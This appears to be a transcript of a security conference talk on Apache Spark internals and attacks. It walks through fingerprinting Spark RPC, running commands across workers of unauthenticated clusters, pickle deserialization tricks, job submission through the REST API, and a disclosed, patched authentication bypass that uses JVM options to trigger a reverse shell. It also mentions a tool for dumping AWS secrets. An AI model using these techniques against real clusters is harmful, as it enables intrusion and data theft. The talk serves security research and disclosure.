 Hello, everyone. Thank you for tuning in. Today, we're going to talk about Apache Spark. Now, we'll just assume that while some of you may be familiar with the technology, a lot of you did not have actual chance to play with the cluster, so we'll take it right from the beginning. We'll see how Spark works, what makes it so popular, how to view some common and default settings, and obviously, some rules along the way to bypass authentication and exit your code. Let's get going. Our story takes us back to 2008, when the economy was not much better than today's, but Internet Explorer was still a thing, and the big tech companies were doing what they did best, quietly collecting the world's data. When you gather that much data, and I'm talking about terabytes and terabytes of data, performing even the simplest calculations becomes quite challenging. Now, you can either get a mainframe for half a million dollars, plus whatever it takes to get an intern to work on it, or you can actually distribute your files over thousands and thousands of servers. That way, your computations are small, though multiplied, and that's one way to handle the load. Then the standard way of doing, so I would say, is by using the Apache Hadoop framework. Now, if you've ever worked with Hadoop, you must know that it's actually quite a hostile environment. It's a very complex environment. First of all, just to give you a quick example, you need to fragment your files using the HDFS file system. Then you need, so you end up with multiple fragments on multiple servers with these files, and then you need to do coherent computations on these small fragments, so you need the MapReduce framework, but then you end up with thousands of processes running on multiple machines, so you need a way to schedule them, enter yarn, but then you want to do some SQL querying, so you need Apache Drill, et cetera, et cetera, so you end up with these plethora of tools, each with their own latencies, with their own learning curve, et cetera, just to cover all your needs and data analytics, so just to give you an example, this is what it takes to do a simple word count on MapReduce, so this is the first page of Java, this is the second page, which is downright outrageous for a data processing solution, right? So in our story, we're around 2009, and there's this guy named Matei Azaria, who was at Berkeley, I believe, at the time, who I imagine looked at this code, and went, are you fucking crazy? That's not going to work. A word count is a simple operation, a word count should be done in five lines of code. Apache Spark was born. Now this is not the official story, the official story is that he was working on something called Mesos, which is a resource manager, and he invented Spark as a proof of concept, but I like my version better. So anyway, needless to say, we'll go through the code later on, but right off the bat, you can see that you can do pretty much the same processing that you would do in Apache Hadoop, except that you can do it at 10 times less code than Spark, but it's also much faster. So it's three times faster on 10 times less nodes, so it's 30 times faster. You see, Hadoop will flush everything to disk whenever it gets a chance, whereas Spark will try to keep everything in memory, and was developed in an era where memory was getting cheaper and cheaper, so it kind of makes sense. But if you're running in a cloud environment where you pay for the usage, having something that runs 30 times faster means that it's 30 times cheaper, actually. And that partly explains the gigantic boom and popularity of Spark amongst the big data companies. If you're serious about your big data processing and clusterfond, you will be using Spark for at least some part of it. And so, yeah, Spark Boomed was adopted by the Apache Foundation, and it grew to encompass many aspects of data analytics. If you can do SQL, streaming, machine learning, graph processing, a guy you covered. So it's developed half in Java, half in Scala, but it also has some connectors in Python and R, so, yeah, awesome. So basically, when you have this powerful framework, suddenly everything looks like a nail. So if you're not doing revenue prediction, you just hook Spark to your, I don't know, Redshift cluster, download those financial statements, and then you can do yourself. If you're not doing fraud analysis, you just start getting same, you hook it up to your Cassandra database, your extra buckets, you upload or download those log files, and then you do your computation. So basically what I'm saying is that Apache Spark is often at the junction of almost every important data store inside the company. And that's what made it interesting for me because, well, if you can access this tool, you're pretty much open to every database that's out there. How is it protected? How does it work? What is it security, et cetera? And so what I did, I did what any sensible person would do. I went to the documentation to their website, and I went to the security page, and lo and behold, from this magnificent sentence that says, security in Spark is off by default, well, fuck me. And what does it do again? Oh, yeah, it's this gigantic framework cluster of hundreds and hundreds of machines that have access to every database inside the company. And what does it do? Oh, yeah, it does distributed data processing, or as I'd like to call it, it's really distributed remote code execution. Sorry, but this would be fun. And I hope I picked your interest because really that's what sparked my, the whole endeavor, no pun intended. And I hope I got interested enough to actually continue along this presentation so we can explore how it works and some bones that I found, right? So, oh yeah, in keeping with def cost tradition, I think it's time for drinking. I should not do this online, but now what the heck? So, to def cost safe mode, cheers. Yeah, that will kick in later. Anyway, so what is Spark and how does it work? I hope it's gonna be one tape because I cannot do that five times. So how does it work? So as in everything in distributed processing, basically, we start with a bunch of machines that we're gonna call workers. Now these workers will just basically brainless machines that will execute whatever is sent their way. Now on each worker, you find a JVM process, so a Spark process that's called an executor and that's gonna do the actual execution. Now you can have many executors on each worker and it's basically executor that defines your power in terms of parallelism. So if you have 10 workers on each worker or each machine, basically you have three executors so you can run 30 tasks in parallel. So yeah, you have some default HTTP port that gives a status of what's going on on the machine, not interesting, but you have the random RPC port that is set for each executor and it's this one that the rest of the cluster contacts in order to send and receive status from the worker. Now the worker is fine, but the most important piece or one of the most important pieces is the cluster manager and that's our second piece. The cluster manager's sole job is to actually schedule the application so the work that is coming and say, oh yeah, this application is gonna run on these two workers, that one is gonna run on the other three workers. So it has a status of the workers, what they're doing, are they online or not, are they busy or not, et cetera, I know. Every component inside Spark communicates using this Spark RPC protocol that we will detail a little bit later on. And just to show you what it, to mystify this Spark cluster, this is what it looks like. This is the basic UI of the Spark master on port 8080. Sorry about that. So yeah, you can see that we have two workers, one which is dead, we have an application that's running on two cores and since each worker has one core, so this application is running on two cores, it's being distributed over two machines. But the most important part really is port 7077 because that's the one that we're gonna contact in order to send an application, register it and schedule it to be executed in parallel on these workers. And it's gonna be these basic hypothesis that we're gonna make along this presentation that we have access to that, to this specific ports. Now the third component and indeed the most important, sorry, is the driver. And the driver is really the brain behind the application orchestration. It's the one that's gonna slice up your application and small tasks, contact the cluster manager, receive the worker and then send this to your workload to these worker and make sure that everything is going smoothly and aggregate the results. And the driver in a typical case or typical scenario is gonna be running on your laptop. So you enter a network, you have the cluster manager running somewhere, you have the workers running somewhere else and you're gonna boot up the driver, write your application in Java, Scala, Python or whatever, boot up the driver and then send it to the cluster manager to be scheduled on the workers, hopefully to execute some code. So that's one setup that's kind of common. Right, so recon. So let's take this specific scenario that I just listed. Let's say you end up in a network and you wanna find, you wanna hunt for some spark in order to exploit it, how would you go about it? Well, the first thing you wanna do I guess is basically if you're in an AWS environment, you can simply use the API if you have the proper access rights obviously to look for every machine that has Spark master or other keywords in their labels. Similarly, if you're at a cube environment, Kubernetes, it's the same thing. But what if you end up in a more traditional network where you have to end map the shit out of things? How can you find that cluster? Because you see NMAP does not really support a Spark. So we're in the kind of a pickle here. So the first thing we wanna do is be able to fingerprint Spark properly using NMAP. And to do that, I simply without a Spark cluster on my lab, I put some wire in a shark in the middle and I analyze the traffic. And if you do that, this is the blob that you're gonna see. And basically the way to decompose this is fairly simple and it's quite repetitive actually once you get to know Spark RPC. So this is the Spark RPC I was talking about. It's always starts with the same thing, the same header was gonna be most of the time, 21 bytes of data followed by the payload, right? And these 21 bytes of data, a common header when you use, when you send Spark RPC commands, is composed of seven bytes of null bytes followed by two magic bytes. I call them magic bytes, but basically they depend on the RPC endpoint that you're trying to reach and the type of message that you're sending. So in this case, I chose the example of like, you know, verify endpoint check existence message and it's magic byte is C305. If it's, I don't know if it's a worker sending a heartbeat message to the cluster manager, it's gonna be 2B0F or whatever. But in this case, it's C305. But anyway, it doesn't matter. Next, we have eight bytes of data, like random data you can put anything you want here, they'll just be echoed back by the cluster manager. And finally, we have, you know, four bytes of the size of the data that's gonna follow, so the payload that will follow. What is this payload? Well, you have a bunch of data on IP addresses that we don't care about, but the most important thing really, the heart of the payload, if you will, is this serialized object that you can see here. So it's a serialized JVM object called check existence. And if you look at the source code, check existence is actually a class. Well, it's a Scala case class, but just think of it as a regular class, which is immutable and it has some interest in other properties in Scala that we simply don't give a fuck about, but yeah, it's a class. So check existence is a class and it has an attribute name. So basically the client, the driver, is sending this serialized class to the cluster manager to see if there's an endpoint bearing the name that it sent and the name that it sent is obviously master. So it wants to know if there is a master RPC endpoint listening on the other end of the communication. And if that is the case, the cluster manager, well, will respond first with the 21 bytes of data that you can see it echoed back what we said before, right? And a different magic RPC, magic two bytes, but anyway. And if there is indeed an endpoint, it sends a Boolean that is set to true. So obviously I took this special exchange because we can use it and map to fingerprint the cluster manager, but you have to imagine that all Spark RPCs are these exchange of serialized data that are prefixed with some type of header, either 21 bytes header or 13 byte header that we will see a bit later on, but this is the main way that Spark components communicate with each other, just serialized objects. So once we have this exchange all mapped out, then we can use it and write a Lua script that will replicate the same thing. Once you do that, obviously, once you deconstruct it like this, it becomes quite obvious to do it. So I wrote an Nmap script that's on my repo. Sorry, and I will push it to the real Nmap repo once I, you know, people have used it enough and debugged it enough. So yeah, now we are able to identify Spark cluster. And you can see they've been true to their promise authentication is indeed disabled by default. So this is pretty great. Now comes the interesting part. Now we know how to locate Spark clusters inside the network. How can we execute code, right? Because that's what's really interesting. Now the standard way of submitting an application onto a Spark cluster is basically you write your application in Java or Scala or whatever, what have you. You package it as a JAR file, you boot up the driver and then you send that JAR file to be executed or parsed if you will by the cluster manager and the workers. Now the problem is this, I find write in Java boring, sorry, and Scala makes me want to shoot myself. So I decided to do it in Python. And luckily Spark supports Python. In fact, they have an official wrapper called PySpark which actually takes care of all the nazis that I just described. So it will boot up the driver for you. It will serialize JVM object into Python object and vice versa and send it. And it will take care of all the nazis bits for you. So you just write a simple Python. And so yeah, PySpark, and if you've been stole PySpark, it really is just a thin wrapper. It downloads 200 megabytes of JAR file behind. So it's hilarious. Anyway, so from PySpark, you, like we import these two classes, Spark context, Spark configuration. It's very straightforward, very intuitive, I would say. So you define the configuration. We're gonna name our application worth count. We're gonna point to the cluster, port 7077, obviously. Now you have to define your IP, your public IP that you're gonna bind on. We're gonna see why later. But if you forget this line, it will not work. Now what does it say so in the doc? But if you forget this line, it will not work. So anyway, so you define the Spark context. Spark context is gonna be the client that's gonna initiate the communication and handle the communication with the cluster manager. And basically when the Python interpreter comes to this line, it will boot up the IJVM process. We talked about the driver and it will initiate communication with the cluster manager. So quite naively and quite intuitively, I would say, what we wanna do next is obviously just send the code that we want to be serialized and we want to be executed on the worker. So from sub process, P open, the command ID. And if you do that, and this is really the first thing that I did, if you do that, it actually works. So I got this result back and I was like, well, hang on. I know that user, that's me. I have that user defined on my local machine, not on the worker or the cluster machines. What the fuck happened? So it turns out I actually just executed the code on my own machine. So if you look at where Shark would happen cause I was curious what the fuck happened. I thought this stuff was supposed to serialize and send the command to be executed on the workers. Well, what happened was, first we actually send this, 21 bytes of data, check existence class, yada yada, everything's all right. There is indeed a cluster manager listening. Then we send the register application class, which contains all the information of the application that we're going to run. So you can see that we send, word count plus another other properties, right? The cluster manager responded with executor added class. So they gave us actually two workers. So this is great. What happened next? Well, the driver, so our instance of PySpark simply unregistered the application and called off the whole thing. So what the hell? Well, to understand what happened actually, remember when I said that PySpark will simply serialize whatever comes after the spark context line? Yeah, I lied. Well, the thing is, in order to understand what happened, we basically need to talk about two concepts. First of all, Spark APIs, and second, the notion of a DAG and lazy evaluation in Spark. So Spark APIs countering to which I would say Spark APIs are not methods, they're data structures. So let's say you wanna open a file on Python or Java or Scala or whatever, you point to a file and then you call the method, the open method, this will only give you an object, a Python object refers to a handle in memory, whatever, but a single threaded object nonetheless. There is no parallelism there. And the proper way to do it in Spark and still get that parallelism is actually to call the text file method of the Spark context class. So here Sc is an instance of a Spark context. So you point to a file, you call the text file method and text file method will grab that file, slice it in two fragments and then load those two fragments in memory. Similarly, if you wanna load a list, you just don't define a list like that, this will give you only a single threaded object in memory, no. You need to call the parallelized method which will take that list, slice it in half or three or four, whatever Spark's theme is necessary. And that way you will end up with two fragments in file on which you can perform work in a parallel fashion. Now these fragments are called partitions. This is a very frequent term in Spark that will come up a lot. Partitions are the main unit of work inside Spark. And these collection of partitions are called resilient distributed data sets which is really the most fundamental API in Spark. There are others, but they're ultimately all based on RDDs at the core. So once we have these partitions, then we can apply parallelized work using something called transformations in action. Now what's a transformation? A transformation, now let's say I wanna multiply every element on the list by 20, let's say. The concrete example will actually make it better. So I define a method called multiply which takes an element, give multiplies by 20. And then I just call the map transformation which will iterate over every element in every partition and yield the same number of elements and the same number of partitions. So that's a transformation. There are other types of transformation which may or may not yield the same number of partitions and elements by the way. So yeah, each Spark API basically defines these transformations and actions to work on. And so what happens is if I write this code thinking that I just multiplied every element by 20, actually nothing gets sent to the workers just yet. Nothing happened. Nothing gets computed. I will have the same results as I had earlier. But in fact, I would have nothing. Why? Because when the driver starts parsing this application, all it does is actually it builds an execution graph. And this execution graph is called the Dagen Spark terminology. But basically all it does it follows all these calls that we made. So, oh yeah, it knows that it's gonna call it paralyzed. So it knows that it's gonna build an RDD. It doesn't care what's inside. It just knows that it's gonna build an RDD with the X number of partitions. Then, oh yeah, we're gonna call a map. It doesn't care what's inside the map. It doesn't care that we're gonna multiply every element by 20. That's not the driver's job. The driver's job is only to follow, to build this execution graph. So it knows that it's gonna apply a map. So given a set number of partition, it's gonna have in output the same number of partition. It's gonna continue building up this tag. Maybe there's gonna be a filter map, which is another type of transformation, et cetera. And it's gonna continue building this graph until it hits an action. An action in Spark is something that's gonna force it to do the actual computation. So think like save file or collect or take sample. All these methods that you can call in an RDD that will force it to actually have the right value. And once you do that, once you call a collect or an action in Spark, then and only then will the graph be sent to the executors. The graph, mind you, not the code. Simply the graph. And it goes a little bit like this. So the driver will send to the workers the graph of execution. The workers will go through this graph and they go, oh, I need to paralyze it, but I don't have that list. Oh, you know what? Give me that list. And the driver will send all these serialized objects one after the other. I need to do a map. Oh, but I don't have the function multiply. You know, they ask the driver to give, serialize the function, the method and send it to the workers, et cetera. And then they're gonna apply those methods. So in each worker will only apply these methods, will only follow the DAG on its own partition. So the worker number one will loop through the elements of the first partition. So one, two, three, multiply by 20, 20, 40, 60, send back the result to worker number two will do the same and the driver will aggregate the result and present it to the operator, us. So when you think about it this way, and you go back to our code earlier with our sub-processor, we're just sitting naked there alone in the wilderness. Well, of course it didn't make it to the workers. The workers are only ever aware of the DAG. And so we need, if we want to execute code, we need to somehow embed it inside the DAG. So we need to put it inside a transformation, hence the following code. So here we can see we define a Lambda function, anonymous function, and inside we put our popen command execution stuff. And obviously we need to follow it by an action, otherwise nothing gets sent. And this is the skeleton that you need to follow, or the basic skeleton you need to follow in order to achieve code execution on Spark across multiple machines. Now, if you don't want to be bothered by creating like, you know, RDDs, handling parallelism and whatnot, I took the skeleton, put it in a fancier way or something like that, and I incorporated in a tool called Sparky that will take care of all this stuff for you. So you just, you know, point to a cluster, point to the IP that you want to target, send the command that you want, and then how many times, on how many workers you wanted to execute, and it will do that for you. It will build the RDDs, it will build the APIs, call the transformations, the right ones in order to achieve the code, the execution that you want. And this is what it looks like really. So again, I'm gonna make it a, I'm gonna publish it on GitHub for everyone. So yeah, you'll have a chance to look at the code. So you can see here, we just pointed to the cluster, we specify our public IP address, the command that we want to execute and the number of workers that we want to target. And you can see here that we have execution on three machines, great. I also had some, you know, I embedded some scripts to make it easy to run in an AWS environment to like dump some AWS secrets if you want or search for files that are sometimes dumped by Spark, you know, work in some work folder. So you can search for AWS keys or secrets or whatever. So it automates a lot of the pentests in Spark. So yeah, yeah, that will get you started. Next, now in this type of execution that I just showed, there are some problems that are quite annoying. Let me go through them very quickly. First of all, the Python version on the driver needs to match the one on the worker, down to the minor version, otherwise it will throw an error. Now there's a way, yeah, so you can see, even if you have a worker that's on 3.5 and your driver is on 3.7, you're kind of screwed. So there's a way around it. Since the check is simply done by checking the version info, you can just override it. So you can see here that I put it like 3.5. And if you do that, it will work so long as there's not too much of a gap between the two versions. So you can get away with 3.6 and 3.7 because the serialized objects are similar to some extent. But you cannot get away with the 3.4 and the 3.7 or there's too much of a gap. And the way around that is simply, well, to override the file, but also to take advantage of the fact that a Spark cluster will use, or PySpark will use pickle these serializers to deserialize the object. And in pickle, you can specify a method. If you define the method reduce of an object, it will get executed first, before in the process of deserialization. So before it fails that deserialization process later on, it will have executed the command reduce, which contains the execution command. And so you simply need to define the object and send the method as part of that object and it will get you through. So even though the job submission fails, you still achieve code execution over however many workers you decided. And I did not incorporate it inside Sparky because this is just a hacky way, really the easiest way is simply to align your versions, your version of Python with that of the workers, but oh well, this is just a fun trick to share. But really the most annoying problem is actually a network problem. See what happens when we register an application, when we send an application, is we contact the driver. Is we, sorry, the driver contacts the cluster manager on RPC port 7077 as we just saw. And we'll send the register application class along with the parameters, the application's name, et cetera. The cluster manager will receive their applications. Oh yeah, I need three, four workers, whatever. Gonna fetch the workers, send them to the driver along with some status data. But then just when you would think that it would be the driver's job to contact the workers, actually it's the workers who initiate the communication towards the driver. So they will be the one contacting the driver on a random RPC port called schedule import to say, hey, we're ready, et cetera. And that's annoying because you don't necessarily have this flow of communication open because the driver is, you know, your computer is usually behind the net or whatever, so you gotta screw it. Not only that, the workers will initiate another communication on another port altogether called the block manager port in order to receive some data blocks, you know, request some serialized objects, broadcast some variables and whatnot. So that's annoying. So on Sparky, I, by default, I, basically I default these settings to some common ports in order to, you know, evade or it works in some settings, but not all. But really the solution is to use what we call a cluster mode. And in a cluster mode, you don't run the driver on your laptop. You simply contact the cluster manager on port 77, 77, yeah. And then you tell it, oh, here's the application to execute and please also set up the driver on your own cluster. And that works pretty well. So in this case, you only need access to port 77, 77. The downside is that you cannot use PySpark. You cannot use Python. So I had to redo that skeleton I showed you earlier in Python. I had to do it in Scala to build a jar file that will paralyze, execute whatever command you give it across however many servers that you want. So yeah, the code is again on GitHub, but you don't need to touch this one. It's this compiled jar file. So you can just use it as it is. It's, yeah. So here are quick examples. You can see we host this jar file that I just showed you on a server that is reachable by the workers. And we simply use Sparky again to build that command to register this in cluster mode. So we just point to this jar file command we want to execute and then we don't need any network condition except for that 70, 77 to reach the cluster. And it works pretty well. It will even auto delete itself. So you don't have to worry about that. So this gets us through the network thing. So these are the main ways to execute code on Spark that I found on a Spark cluster that has no authentication, which is enabled by default. So anyway, let's go explore some other facets of Spark. And there's this interesting interface called, well, it's the REST API. And it is interesting because when you go through the documentation, you can see that it's available on port 6066. And when you look at the documentation, it's really a read-only boring API. I was like, yeah, whatever. And I remember a few days later, I was digging through the source code, like really lost inside the source code amongst weird scholarship, functions, options, and whatnot. And I saw this keyword REST. I'm like, oh my God, I know what that is. And I grabbed it and I followed it. And I came across this piece of code that says something like submit requests, create. I was like, I like to submit stuff. I like to create stuff. So these things do. And you follow this creates a mission request and there's talk about app resource, main class. Like, well, hang on, app resources references a jar usually in Spark code. So I thought this was a read-only API with the hell's going on. So I followed this, creates a mission request and I came across this app resources in the application jar. So basically the REST API, even though the documentation it mentions it's only a read-only API, actually in the code, it accepts a jar file that you can send it, which is kind of amazing. So all you have to do is simply build a JSON file, it accepts a JSON input. So you build a JSON file with the right properties or the app resource, main class, Spark properties and so on. And then you can send your jar file and then chief code execution. And we can take that jar file we used earlier. So simple app jar, send it to command arc. So it just accepts commands to execute in base 64. So this is really, I think a who am I or some shit like, no, not a who am I but touch some file in some folder in base 64 is very simple. And yeah, but there's different properties and you can just curl it, this payload and it will execute codes as simple as that. And this is just to show you what it looks like. But yeah, but again, if you use this method, the driver you don't need it to run on your machine it's gonna run in the cluster. So it's gonna run in cluster mode. And one thing I will mention, if you decide to use the REST API or cluster mode in general, you can send whatever in jar file you want. You don't have to use my specific jar file. But if you will get execution on one worker but if you wanna execute on 200, 300 all the workers inside the cluster then you need to use Spark API. So you need to use some version of the Spark, like Spark APIs I just showed in the Scala code earlier or Java code earlier. So anyway, so this was fun and all that. Well, I wonder if anybody blocked about it and I Googled creates a mission request. I called this and I came across it. The first results on Google was this script and it was already published. And I was like, fuck, so close. Not only that, there was actually an exploit that was already published. There was actually a men's exploit model that was published by these fine gentlemen. I was like, damn it. Just, sometimes you keep your head in the wheel and you forget to do basic research but it was just months away. Anyway, let's get to the real stuff, right? So authentication, let's say you come across a cluster that has all the right switches on, right? So it's enabled authentication and the way to do that in Spark is fairly easy. You just enable authenticate to true and then you define the secrets that you can see here and yeah, all the components you do, you need to do that on every component inside the cluster. So every worker and on cluster manager and the driver and that way they all have a shared secret to communicate with. And if you have an authenticated cluster and you try to communicate with it, you will get this delightful error that says, you send this check existence class and then you get this illegal state exception, ACSL message. Now, ACSL is an authentication protocol, challenge response protocol based on a shared secret as you might have guessed. But yeah, basically the server sends a nonce to the client and the client hashes that with the nonce, hashes the secrets with the nonce and then sends the response plus other parameters that we will see, but fairly simple. But the funny thing is that even though the driver, you configure the driver to use the secrets and you tell it to authenticate, it will first attempt an unauthenticated session. So it will first try check existence, get slapped with this error and then it will try an authenticated message. So it's kind of weird. So anyway, what does it look like an authenticated session? Well, first the driver will send 21 bytes of data to the header, the usual header with the magic bytes, this time set to 2B03 as opposed to C355 earlier, followed by a random bytes that we don't care about the size of the payload, which is definitely wrong in this case because we're not talking, it's not 176 bytes. But anyway, the most important thing in this authentication sequence is that it sends the Spark ACSL user, which is gonna be the user used inside the challenge calculation. So anyway, cluster manager responds with 21 bytes data as usual, the header, and then it follows by the parameters to ACSL parameters to perform the challenge computation. So you have the nonce, random value, realm, QOP, which is the, are we doing authentication or encryption or both? These delightful algorithms to use in case we're doing ACSL encryption. Now just to reassure you, Spark does not use ACSL encryption by default. It uses AES, but it's definitely possible to use it as a fallback. And the algorithm, and this one is indeed used to calculate the hash. And the calculation of the hash, you're not gonna do it honestly, it's detailed in RFC 2831, but you take a bunch of data, you hash it in MD5, you take the output, you combine it with the nonce and other stuff, and then you hash other types of data, and then you combine everything which gives you the response to the challenge. Again, if you wanna know more about it, Google it RFC 2831. So, the driver sends the response to the cluster manager. If everything checks out, the cluster manager acts. Right. And then it can follow the classic flow of communication. So basically check existence class, you know, register application, register with application, executors added, yada, yada. Now here's what bothered me, one of what bothered me, what ticked me a little bit, is that this authentication step was only ever done when there was an RPC endpoint that was prefixed, that an RPC communication that was prefixed with those 21 bytes of data. But it turns out there's another header that is sometimes sent before payloads, that prefixes payloads. And this header is only 13 bytes long. And it's usually sent inside the middle, inside the TCP stream. So it's inside the same TCP session. So I did not have much hope. I was like, well, maybe the cluster actually remembers that it's an unauthenticated session. So that's why, et cetera. But nevertheless, I thought, well, you know what? Let's see what it looks like. Let's see if we start the communication from here. So we don't send this check existence header which prompts the authentication message. Let's just send start communication from here by sending these 13 bytes of data followed by the register application because that's what we really care about, right? We want to submit an application. That's what we really want. And so if you begin communication at this stage, you first send 13 bytes of data. It looks awfully similar to the 21 bytes header, but basically, oh, sorry. You have four bytes and four null bytes followed by the size of the payload plus the header. So the size plus 13, the magic byte nine which didn't change for some reason. And four bytes of data which are the actual size of the payload. And then you send the serialized register application with all its attributes, applications name, yeah, yeah. And I sent this and I was expecting a massive error like those JVM 100 line errors, but instead I got a header followed by register application class. And I was like, is it me or is it just possible to bypass authentication? I was like, hallelujah, it's amazing. Now bypass authentication is fine, but what can we do with it? Because I was not going to recreate the 80 next messages that were following along, now it's not possible. So what can we do with just one message? Well, if you look back at Spark, how it works, the register application class is the one that prompts all that workload on the cluster manager that's gonna contact the workers and say, hey, I've got an application for you. You better get ready, spawn those executors and get ready to take the work. So I went ahead to the workers and I replayed my message hoping to see some process spawner, whatever, but I didn't see anything. And the reason for it, I figured out a couple of days later was because when you send this payload, serialized register application, when you send it, the cluster manager receives it, I immediately shut down the connection, the program terminated. So the cluster manager did not have enough time to actually contact the worker, spawn the process and let it do its thing. No, so I immediately shut down the connection. So the way around it in order to give time, you simply need to do a sleep, as simple as that. You send the register application, you sleep for five second, that way you give enough time for the cluster manager to contact the worker, spawn the executor, and do its work. And once you do that, once you do that sleep, I saw, like I put a watcher on the worker, monitoring for processes, and I saw this process getting started. And the magnificent thing about it was that it took, as parameters, something that I was defining inside that serialized register application, the block manager report set to eight, four, four, three. And I know it was me because I'm the one that said it in order to have communication come from the worker to the driver. So I thought, okay, authentication bypass is a sure thing. Remote code execution is a definite maybe because you can influence parameters that are being used to spawn a process. So maybe there's some injection there. So I turned to this register application class and saw, like, okay, what's inside? What can we define as parameters as options that we can take advantage of? So register application, again, a case class, which extends the deploy message, which implements the trade serializable. Don't care about that. Application description, what does it do? Okay, so if you're like me, you're gonna ignore all this shit and go straight to command, right? Because the command class, command case class, it has the main class, which is the class of the executor to be executed. We cannot override that. Have arguments, environments, a bunch of parameters. Now, if you just wanna inject, like, you know, semi-colon or and or a pipe, it will not work because these parameters are sanitized. So we need a more clever way of hijacking the execution. And the way to do it, I found the easiest way to do it at least is using these Java options. Now, if you're familiar with the JVM, you know that you can actually specify or control the behavior of that JVM, like, I don't know which garbage collector to use, how should strings be compressed, the amount of heap memory, et cetera. Well, it turns out if you dig into the hundreds and hundreds of Java options, there is one actually that allow code execution. Oh, so yeah, this is an example of a JVM option. So there is one that allows code execution and it's called an un-out-of-memory error. And you just specify a command that it will execute. The catch is that it only executes it if there's an un-out-of-memory error. So like its name said. So if the executor or a process fails to allocate memory, heap memory, then you will throw this error and then it will execute code. So how to make the executor trigger this error? Well, simple way is simply to add another JVM option, XMX, which will set the maximum amount of memory to a particular set of like one megabyte or two megabytes. And once you combine these two properties, then you have your code execution. And so ideally we'd like to do something like this. Obviously we cannot do it inside the code because while the driver will attempt to authenticate, which is no good and anyway, you cannot set the XMX inside the driver. So we really need to forge by hand basically that serialized object, embed these options and have a properly serialized object and send it to the cluster manager. And again, easy way to do it using Sparky. So I just point, so this is just a quick example to show you how to exploit this phone. So this is the reversal that we want to execute, right? So I just point to Sparky. I want to execute this code, but as you can see it required, the cluster requires authentication. But if I add that speed, then it will take care, it will take advantage of this phone and you can see it bypassed authentication just executed code directly. And it was going to execute it on as many workers as requested. So yeah, we just bypassed authentication, which is executed code on workers. So great. So yeah, so now that we understood like the hacker intuitive way of finding this phone, let's go through the code because I think it's interesting. If you see, like I made the distinction between the 21 bytes of the payload that was prefixed with 21 bytes of data or prefixed with 13 bytes of data, it turns out there's actually a difference in the dispatcher. So the register application is handled by the process one way message and the process one way message called the receive method of the RPC handler, right? So it delegates to the receive and you can see there at no point there is any authentication going on here. The delegate receive will actually perform the work. If you compare that with the other receive method which actually asks for authentication, you can see that it's quite beefy and different. So the correction, basically the patch was to protect that same receive method and another one used in streaming, which was affected also. By the same type, the same types of checks. And this was labeled CV 2020, 9480. I disclosed that on 24th of December, I found that I'm mistaken, which was very horrible for me. But anyway, and yeah, it was fixed by the Apache Spark team. So thank you very much for the work that you guys have done. It's amazing. Yeah, so in summary, what I wanna say is Spark is awesome. I'm gonna say too bad security is not taken seriously and I'm not talking about the folks who manage security there. I'm just referring to the fact that security is off by default. I don't think that should be something that we should have in 2020, especially for something that's a framework that does data computation. And we all know how data is valuable. So I say it in reference to that. So that's, anyway, I hope that will change. And finally, yeah, we only covered Spark standalone where the cluster manager is actually the one doing the work. But you can have other setups where it's actually yarn that's doing the work or I think even a Kubernetes API server in Spark 3. So yeah, there's a lot of ground to cover. So if you wanna dig into it, go ahead. Yeah, the code to Sparky, if you wanna check out these Spark APIs, the serialized object that's being forged in order to buy positive on all that stuff, it's there. I hope you got enough of this talk to actually dig into it because that's really the only way to figure out how stuff works. So yeah, your contribution are most welcome. And if you wanna hit me up on Twitter, to talk about it more, please do not hesitate and looking forward to talk to you guys and to talk to you folks in the QA. Thank you very much. Bye bye.